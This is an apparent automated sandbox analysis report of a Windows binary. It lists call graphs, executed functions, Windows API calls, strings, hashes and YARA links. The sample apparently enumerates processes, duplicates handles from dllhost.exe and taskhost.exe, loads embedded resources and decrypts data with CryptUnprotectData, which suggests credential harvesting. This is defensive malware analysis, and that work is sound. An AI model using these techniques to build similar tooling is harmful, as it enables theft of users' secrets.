40397->40400 40398->40397 40401 4165ff 11 API calls 40400->40401 40402 438054 40401->40402 40436 437371 40402->40436 40405 43806b 40406 438094 40405->40406 40475 42f50e 139 API calls 40405->40475 40408 437fa3 40406->40408 40409 4300e8 3 API calls 40406->40409 40408->40389 40476 41f638 104 API calls 40408->40476 40409->40408 40411 437d69 40410->40411 40414 437d80 40410->40414 40477 437ccb 11 API calls 40411->40477 40413 437d76 40413->40390 40414->40413 40415 437da3 40414->40415 40416 437d90 40414->40416 40418 438460 134 API calls 40415->40418 40416->40413 40481 437ccb 11 API calls 40416->40481 40421 437dcb 40418->40421 40420 437de8 40480 424f26 123 API calls 40420->40480 40421->40420 40478 444283 13 API calls 40421->40478 40423 437dfc 40479 437ccb 11 API calls 40423->40479 40426 41f54d 40425->40426 40432 41f44f 40425->40432 40427 41f466 40426->40427 40511 41c635 memset memset 40426->40511 40427->40393 40427->40396 40432->40427 40434 41f50b 40432->40434 40482 41f1a5 40432->40482 40507 41c06f memcmp 40432->40507 40508 41f3b1 90 API calls 40432->40508 40509 41f398 86 API calls 40432->40509 40434->40426 40434->40427 40510 41c295 86 API calls 40434->40510 40437 41703f 11 API calls 40436->40437 40438 437399 40437->40438 40439 43739d 40438->40439 40442 4373ac 40438->40442 40513 4446ea 11 API calls 40439->40513 40441 4373a7 40441->40405 40443 416935 16 API calls 40442->40443 40444 4373ca 40443->40444 40446 438460 134 API calls 40444->40446 40450 4251c4 137 API calls 40444->40450 40454 415a91 memset 40444->40454 40457 43758f 40444->40457 40469 437584 40444->40469 40472 437d3c 135 API calls 40444->40472 40512 415308 free 40444->40512 40514 425433 13 API calls 40444->40514 40515 425413 17 API calls 40444->40515 40516 42533e 16 API calls 40444->40516 40517 42538f 16 API calls 40444->40517 40518 42453e 123 API calls 40444->40518 40445 4375bc 40448 415c7d 16 API calls 40445->40448 40446->40444 40449 4375d2 40448->40449 40449->40441 40451 4442e6 11 API calls 40449->40451 40450->40444 40452 4375e2 40451->40452 40452->40441 40521 444283 13 API calls 40452->40521 40454->40444 40519 42453e 123 API calls 40457->40519 40458 4375f4 40463 437620 40458->40463 40464 43760b 40458->40464 40462 43759f 40465 416935 16 API calls 40462->40465 40467 416935 16 API calls 40463->40467 40522 444283 13 API calls 40464->40522 40465->40469 40467->40441 40469->40445 40520 42453e 123 API calls 40469->40520 40470 437612 memcpy 40470->40441 40472->40444 40473->40389 40474->40408 40475->40406 40476->40389 40477->40413 40478->40423 40479->40420 40480->40413 40481->40413 40483 41bc3b 101 API calls 40482->40483 40484 41f1b4 40483->40484 40485 41edad 86 API calls 40484->40485 40492 41f282 40484->40492 40486 41f1cb 40485->40486 40487 41f1f5 memcmp 40486->40487 40488 41f20e 40486->40488 40486->40492 40487->40488 40489 41f21b memcmp 40488->40489 40488->40492 40490 41f326 40489->40490 40493 41f23d 40489->40493 40491 41ee6b 86 API calls 40490->40491 40490->40492 40491->40492 40492->40432 40493->40490 40494 41f28e memcmp 40493->40494 40496 41c8df 56 API calls 40493->40496 40494->40490 40495 41f2a9 40494->40495 40495->40490 40498 41f308 40495->40498 40499 41f2d8 40495->40499 40497 41f269 40496->40497 40497->40490 40500 41f287 40497->40500 40501 41f27a 40497->40501 40498->40490 40505 4446ce 11 API calls 40498->40505 40502 41ee6b 86 API calls 40499->40502 40500->40494 40503 41ee6b 86 API calls 40501->40503 40504 41f2e0 40502->40504 40503->40492 40506 41b1ca memset 40504->40506 40505->40490 40506->40492 40507->40432 40508->40432 40509->40432 40510->40426 40511->40427 40512->40444 40513->40441 40514->40444 40515->40444 40516->40444 40517->40444 40518->40444 40519->40462 40520->40445 40521->40458 40522->40470 40523 441819 40526 430737 40523->40526 40525 441825 40527 430756 40526->40527 40539 43076d 40526->40539 40528 430774 40527->40528 40529 43075f 40527->40529 40541 43034a memcpy 40528->40541 40540 4169a7 11 API calls 40529->40540 40532 4307ce 40534 430819 memset 40532->40534 40535 415b2c 11 API calls 40532->40535 40533 43077e 40533->40532 40537 4307fa 40533->40537 40533->40539 40534->40539 40536 4307e9 40535->40536 40536->40534 40536->40539 40542 4169a7 11 API calls 40537->40542 40539->40525 40540->40539 40541->40533 40542->40539 40543 441939 40568 441247 40543->40568 40546 4418ea 40547 441897 40549 442bd4 40547->40549 40550 4418e2 40547->40550 40549->40546 40572 441409 memset 40549->40572 40550->40546 40571 4414a9 12 API calls 40550->40571 40553 4308a4 40554 4308e4 40553->40554 40555 4308bc 40553->40555 40578 42b896 memset 40554->40578 40573 42c0c8 148 API calls 40555->40573 40558 4308d3 40560 4308e8 40558->40560 40561 4308d8 40558->40561 40559 430931 40559->40547 40575 42b896 memset 40560->40575 40574 4169a7 11 API calls 40561->40574 40564 4308f3 40576 42bbbe memcpy memcpy memcpy memset memcpy 40564->40576 40566 4308ff 40577 415c23 memcpy 40566->40577 40569 42b63e 14 API calls 40568->40569 40570 441259 40569->40570 40570->40546 40570->40547 40570->40553 40571->40546 40572->40549 40573->40558 40574->40554 40575->40564 40576->40566 40577->40554 40578->40559 40579 41493c EnumResourceNamesW

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                                                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                    Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                    • String ID: AE$BIN
                                                                                                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                    Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 767404330-0
                                                                                                                                                                                    • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                    • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                    Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 00407082
                                                                                                                                                                                      • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2037443186-0
                                                                                                                                                                                    • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                    • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
